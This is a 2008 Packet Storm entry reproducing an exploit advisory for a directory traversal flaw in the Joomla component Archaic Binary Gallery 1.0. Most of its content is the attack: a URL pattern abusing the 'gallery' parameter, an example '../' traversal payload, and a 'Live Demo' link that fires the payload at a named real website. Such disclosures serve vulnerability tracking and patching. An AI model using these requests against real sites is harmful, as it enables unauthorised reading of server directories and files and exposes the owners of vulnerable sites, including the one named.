Joomla Archaic Binary Gallery Directory Traversal

2008-10-24T00:00:00
ID PACKETSTORM:71197
Type packetstorm
Reporter Valon Kerolli
Modified 2008-10-24T00:00:00

Description

                                        
                                            `#############################################################################  
# #  
# Joomla Component Archaic Binary Gallery Directory Traversal Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] Component: "Archaic Binary Gallery (com_ab_gallery)"   
[~] Version: "1.0"  
[~] Author: "Zharvek"  
[~] Author E-mail: "zharvek@archaicbinary.net"  
[~] Author URL: "www.archaicbinary.net"  
  
########################################  
  
[~] Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=[Directory]  
  
[~] Example: /index.php?option=com_ab_gallery&Itemid=37&gallery=/../../  
  
########################################  
  
[~] Live Demo: http://gsegyview.sourceforge.net/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../  
  
########################################  
`